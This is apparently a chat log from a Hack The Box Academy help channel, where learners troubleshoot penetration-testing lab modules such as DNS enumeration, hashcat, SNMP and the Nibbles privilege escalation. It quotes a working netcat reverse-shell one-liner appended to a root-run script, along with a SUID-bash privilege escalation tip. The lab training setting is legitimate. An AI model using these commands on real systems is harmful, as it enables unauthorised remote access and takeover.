
@gray shoal next time ask for permission before dming

and 2 i don't know that person

where please ? normaly phar is okay

Ok then nvm

what is NVM ? I am French ^^"

nvm - nevermind

Module: Information Gathering - Web Edition
tasks: Active Subdomain Enumuretion

hi guys i have a problem
I added the domain and IP address of the machine in the question to the host file, but I cannot analyze it with the nslookup tool.

i can ping inlanefreight htb

nslookup domain ip

nslookup inlanefreight.htb target_ip

*** Can't find inlanefreight.htb: No answer

i dont understand why isnt working

you need to use the target_ip to query it with

my etv/hosts

machine_ip inlanefreight.htb

you still need to specify the ip with nslookup

otherwise it just attempts to use public dns servers, which will fail

okey understand but not working
nslookup inlanefreight.htb 10.129.97.97
Server: 10.129.97.97
Address: 10.129.97.97#53

*** Can't find inlanefreight.htb: No answer

10.129.97.97 (machine_ip)

are you connected to the vpn?

:)

yeap

and im looking web page use the apache

try removing it from the /etc/hosts file and see if that makes a difference

i remember it being a bit odd at times

oky im try

reset the machine and remove my hosts conf and again added now i have diffrent error
** server can't find <diffrent_ip>.in-addr.arpa: NXDOMAIN

what did you add now?

hosts file

new_ip inlanefreight.htb

what section is this again?

Module: Information Gathering - Web Edition
Sıbject: Active Subdomain Enumuretion
tasks1 : Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer.

nslookup -type=NS inlanefreight.htb ip?

oh okey its working

you needed to specify the type

that's why

i think maybe this machine have a problem

no

bcs before use the command and not working
commnand-> nslookup -type=ANY inlanefreight.htb ip

works fine for me

you need to read the section again to understand the commands

because you need to add a -query type

yeap understand thx

hey guys, did someone here do the prolabs?

this channel isn't related to prolabs

I know but they say the role path is equivalent to some of the prolabs

eh i wouldn't say equivalent

i would say it helps but i wouldn't go as far as to say it's equivalent

i.e. CPTS covers 80% of what you'd find on Zephyr

but i wouldn't say it's 1::1

https://academy.hackthebox.com/academy-relations/prolabs/offshore

that's how it's exabits

modules + certificate = prolab

yes; however there's more to those than what's in the courses

¯_(ツ)_/¯

not to mention a few of those are outside of the course

that's Y I'm asking
& it's knida annoying

but it being equivalent is kinda not correct to say

those modules will help you understand and adapt your techniques to attack the prolab

there has to be an easier way to get the shell code for the intro to assembly skill question1

cyberchef

but I'd recommend sticking with what you know with gdb first

Hello I am new

if you're still stuck dm me your code

Guys, do you think Mac M1 Pro is good for bug hunting and penetration testing??
I'm a software engineer and I'm using it for my daily full time work

I can't identify myself because of my alt account @rustic sage

Any admins here? Please?

I need help

just dm one

literally if you clickthe member list next to the search bar on desktop if you don't already see the list on the righthand side

Dude I alrdy know

plenty of mods are online rn

It's just that

No one is replying

then be patient

you're not owed any sense of rushed support

@frosty spade

Nvm

I need admins help

just chill and wait

i can see your name basilisk

@frosty spade he's trying to link his htb account

oh

his discord username is basilisk that doesn't mean that's his htb username

Basilisk is a Harry potter character fam

i know go team slytherine

while technically true, the Basilisk is a mythological creature from before Harry Potter

Malfoy gang

No wonder

pspssps @urban sage

It appeared since Salazar Slytherin sealed in the chambers of secrets

man whoever wrote this module should be old yellard im going in circles been at this for 4 days

skill issue

it is indeed, skill issue. the module is quite well writtern imo

also @next bronze offered help

i'm gonna loop myself into a rope

its ment to be an introduction what does an intro gotta do with skill im starting in something the question acts like ive been reasearching this for years

Hi everyone, please if anyone know from where I learn how to perform phishing assessments if you have any resources or courses please recommend
TIA

Phishing is bad

@rustic sageDm me.

Intro Assembly is very much an intro to the topic. You really don't need to know anything to follow it. It's not going to make you a pro.

It's a project bro just for testing user awareness

Module: Linux Priv Esc > Capabilities
Having some issues to override the /etc/passwd. I've identified that the vim.basic has the capability needed. When trying to edit the file in VIM I'm unable to exit, and doing it in a non-interactive way doesn't change the file...

Any ideas?

https://getgophish.com/

My notes on the interactive mode: ||In vim, press i to enter interactive mode, remove the x from the first line, press Escape to leave interactive mode, and then save with :wq!||

@urban sage

For me the vim is non-responding when using Esc

I know tools but need proper Material to learn in depth

wq! doesn't save

Can anyone gimme link to discord developers

unless i'm missing something

google it

this channel isn't even remotely related

Can't join

U gotta be a dev to join in?

then it's likely invite only via admins of the server ¯_(ツ)_/¯

meaning even if you were to be given an invite by some rando -> you'd be kicked

Are you calling it by running ||/usr/bin/vim.basic|| ?

i'm just stupid that's all

it finally worked to exit vim, this box seems a bit buggy

i forget how vim works sometimes

considering how often i use it, i should know more

worked for me 😮

i'm thinking q!

not wq!; i generally don't use ! after wq

ah

because wq should just work without it

sometimes you need to read what others wrote...

that's what threw me off

🙄 it threw me off at first

sorry was speaking to myself .P

I use wq! because I'm lazy and hate things. Its like saying "Die file die! I dont care what you were before!"

¯_(ツ)_/¯

Currently Working on the Module "Windows Event Logs & Finding Evil". I am at the section "Analyzing Evil With Sysmon & Event Logs". When being connected via the RDP Session the Remote machine is suuuuper slow, barely usable. Anyone else had the same problem? Is this just how it is?

@next bronze for the win thanks for steering me to the right path instead of the cliff I was heading down

Switch to the tcp vpn

Thanks for being my absolute hero today by helping me out with this nooby stuff 🙏 . Works like a charm now

File Inclusion skills assessment

I've identified the working PHP wrapper but can't get around the appended extension, currently trying to find some sort of hidden page but the wordlists aren't finding any. Tips/ideas? Please nothing big, just need a small hint

cracking with hashcat cracking common hashes. i'm supposed to have any clue on which builtin should be using? i've already tried some with the rockyou wordlist

if you just throw the hash at hashcat it'll auto id it

Yeah, I already had the mode, but I don't know if I should just try all the builtin hashcat rules until I find the right one or is there some clue I'm missing?

why are you using rules?

also see if there's a resources button for the module near the top of the screen

that may have a given pw list

DIGITAL FORENSICS Skills Assessment "Determine the IP address of the C2 Server"
Is there a better way than launching ||netstat || bunch of times and "hoping" to get it? I couldnt find this IP in ||arpcache ||

because with rockyou alone it stops with exhausted status and the hint says that i should i use them

use hybrid mode maybe ¯_(ツ)_/¯

idk i haven't done this but it seems weirdly vague; look at the examples maybe and try one of those?

best64 maybe

i've already tried best64, and i also thinked about examples, but in this section there are none with hybrid attack or rules. Prior sections used leetspeak but didnt work either. Im probably missing something or writing something wrong, because it seems too vague for a module exercise

thx anyway

¯_(ツ)_/¯

hashcat module yeah?

y

(it helps to include that kind of info in your initial ask btw)

mb

best form for asking questions is:
Module name, Section name, What you're stuck on - what you've already tried

hello people anyone else stuck on pivoting and tunneling my packets get discarded outside recive window for the ptunnel section

Did you ever figure this out?

Hey can i ask, what do people do in HTB-A if you run into some very slow VMs when you connect to them?

switch vpn to tcp download if i'm not already using it; switch vpn region

Cool thanks ill give it a try! 🙂

hey, I'm in the footprinting module, "footprinting Lab - hard" section (the last one)
I scanned every port, TCP and UDP discovering pop3, Imap and snmp port open.
I used onesixtyone to find a community i could use braa on, but I have nothing as an output.
I'm almost sure I should find something based on what i saw on different forums, so I'm kinda clueless atm
my exact command
onesixtyone -c /opt/useful/SecLists/Discovery/SNMP/snmp.txt <ip>
any help ? 😮

If you are doing academy stuff, are your VM always just fast? Mine seems to lag quite a bit when fx backspacing in the terminal...

you should definitely get an output, the string is in the brackets []

(if not are you sure you're connected to the vpn?)

I'm using the parrot session atm since i couldn't get access to the snmp.txt list anyway, but ye I usually check for the vpn

I don't even have anything as an output, so no " [xxxx] "
I restarted the box without success too

then my second question is did you turn off the vpn before using the pwnbox?

:)

(also that wordlist is in SecLists so if it's not on your computer just download the SecLists repo)

lmao that worked

tysm, i was starting to lose my mind over this

well yeah, if you have the vpn running AND pwnbox running it causes network collisions

good luck with the next bits

imaps is my preffered way; but pop3s works just as well

Hey all, I'm really struggling on the Attacking Enterprise Network: Enumeration and Privilege Escalation. The proxy I set up with ssh dynamic port forwarding and foxy proxy stops working after like 5 minutes, so I tried setting it up with the teams.exe example with msfvenom, but don't know how to get that file and run it on the DEV01 host.

Anyone else have a painfully slow RDP connection today in the pwnbox?

Hi, can someone help with the logrotate privesc section? ||I execute the logrotate binary as explained, and when I invoke the logrotation myself by echo hello > access.log, the exploit code finishes as he should, and I still don't see the temp access.log in /etc/bash_completions.d/||

single > overwrites the file btw

I know, but it doesn't really matter for this purpose I think

i was doing other work, but i was able to use nmap scans and got the service running on port 22 and did a search for some exploits for that service which was OpenSSH 8.4p1 Debian 5+deb11u1. All i could find was a sid exploit which is exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection, there were a couple but this is the one i picked under sid but i picked this one i forgot why its been some hours since i was last on. when use the show options cmd im not sure what options i need to set. i know it says that any option that has yes needs to be set but i followed along with the section and just changed the RHOSTS and LHOST to what was shown and used check but got back an error. Am I using the wrong exploit search or am i supposed to find an ip to connect RHOSTS to and then keep LHOSTS tun0? Dm me with any helpful information thanks!

this is for this

that's gonna get you nowhere

just visit the webpage that's given to you

also RHOSTS will be the given IP; RPORT will be the given port

since it's a public page (indicated by the public IP) then anything relying on a reverse shell is gonna go nowhere fast

Hey. im doing the nibble box and i keep getting this massages when i try to run the monitor.sh to escalat privilege

<er/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh             
sudo: /home/nibbler/personal/stuff/monitor.sh: command not found
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls
ls
LinEnum.sh  monitor.sh    wget-log
nibbler@Nibbles:/home/nibbler/personal/stuff$ 

i followed the intructions from the "Getting started modul" and i cant figure out why this dosent work for me. im unabel to get root

okay. ill try and figure out what the website is

you don't have to try hard

you can put http://ip:port into the browser

:)

okay!! im most likely overthinking it then, thanks for the help!!

yep

the vuln is staring right at you

plugins are nasty

sudo bash monitor.sh

try

the exploit requires the full path

it asks me for a sudo password

iirc

yeah the sudo perms is for the full path

when you ls -la the file does have rwx perms yeah?

AAR okay it has -rw-r--r--

chmod +x it

I just did the Vulnerable Services section on the Linux priv esc module. If one would like to search for vulnerabilities, in services. Is it exploitDB the way to go, or are there any other good recommendations?

fu** lost my connection. brb

Serachsploit maube

oh yes now i can runnet but get thiss nes problem

<er/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh             
'unknown': I need something more specific.
/home/nibbler/personal/stuff/monitor.sh: 26: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 36: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found

check your listener

Hey when doing the dancer course I get
/James.P> get flag.txt. Error opening local file flag.txt

i only godt this ``` Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::8443
Ncat: Listening on 0.0.0.0:8443
Ncat: Connection from 10.129.121.201.
Ncat: Connection from 10.129.121.201:44714.````

no uid=(root) or anyting

yeah it's funky sometimes; i forget if there's anything else you gotta do

strange

could you show the payload you use ?

dancer is a starting-point machine; follow instructions in #welcome and you'll have access to #starting-point - this channel is for academy modules

hmm i unzip the personal.zip. appended the reveraw shell code on the monitor.sh. i opened a connecet via port8080 and donwloaded the LinEnum.sh file. made it a executable and the run it. i used a lisner on port 8448 to make a reverse shell, run the moniter.sh but that failed

you mean the revshell from the section

can you show the revshell you used

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh
``` this one

this one for the monitor.sh : echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.122 8443 >/tmp/f' | tee -a monitor.sh

you should open port 8443 not 8080

the 8080 was to get linenum.sh

if they're following exactly from the section

aaah okay

i used 8080 to transer the files

this is just a pic of my ip

ip

looks like you got a connection

you got a connection , but smh it didn't last for to long

it looks like they sent an interrupt

yah i think i got it temporary, but i have not root

"not have root"

elaborate; did you attempt running commands

echo $0

try

mybe this helps?

Does the script just execute your code? Otherwise just use chmod u+s /bin/bash

And then /bin/bash -p

did you kill you shell or what ?

killing the shell will definitely cause your second shell to drop

I mean why ^C ?

ya after som time i killed it in frustation

[ctrl-c] does that

if you kill your shell , you will lost your shell

i think that’s what it does

yah but i only killed it after severel attemps

ik ik , I was trying to explain to him

try this

use a separate terminal for your listener

anyway

your issue is that you killed the initial shell

i did i have 3 or somthing running

you're not showing any commands run with the 8443 listener

but still no root

just the 9443 one that launched monitor.sh

open your listener , then on a other terminal sudo run monitor.sh

it should work

i take it you're doing the sanity check?

idk , I am just trying to help

same

i have this one

that's the connection

but i'm not seeing any commands run to check any code execution is the point

is that connection still open?

oh okay. maybe i did it wrong becuse on the other therminal i got this massage and i thorgth. Ah man not again so i killed it

what message

from the 8443 connection; try running commands

that's what we're asking you to do

Just do the chmod u+s /bin/bash already

This is taking way too long

sh is interpreted line by line

will that work for this box?

i honestly do not know

If it executes code it will

i execepted a uid=0(root) gid=0(root) groups=0(root) masages in one of thoes terminal. maybe i fucked up at the end.

you won't get that unless you run id

the one in the image

You expect it to run that out of the blue?

strange

you need to run commands for it to execute commands

godda*** i was way to fast to kill it. i did not run the id

machines don't run code without you telling them to ¯_(ツ)_/¯

the command you echoed into the monitor.sh was a reverse shell command

yah fu** i dont know why i excepeted it to.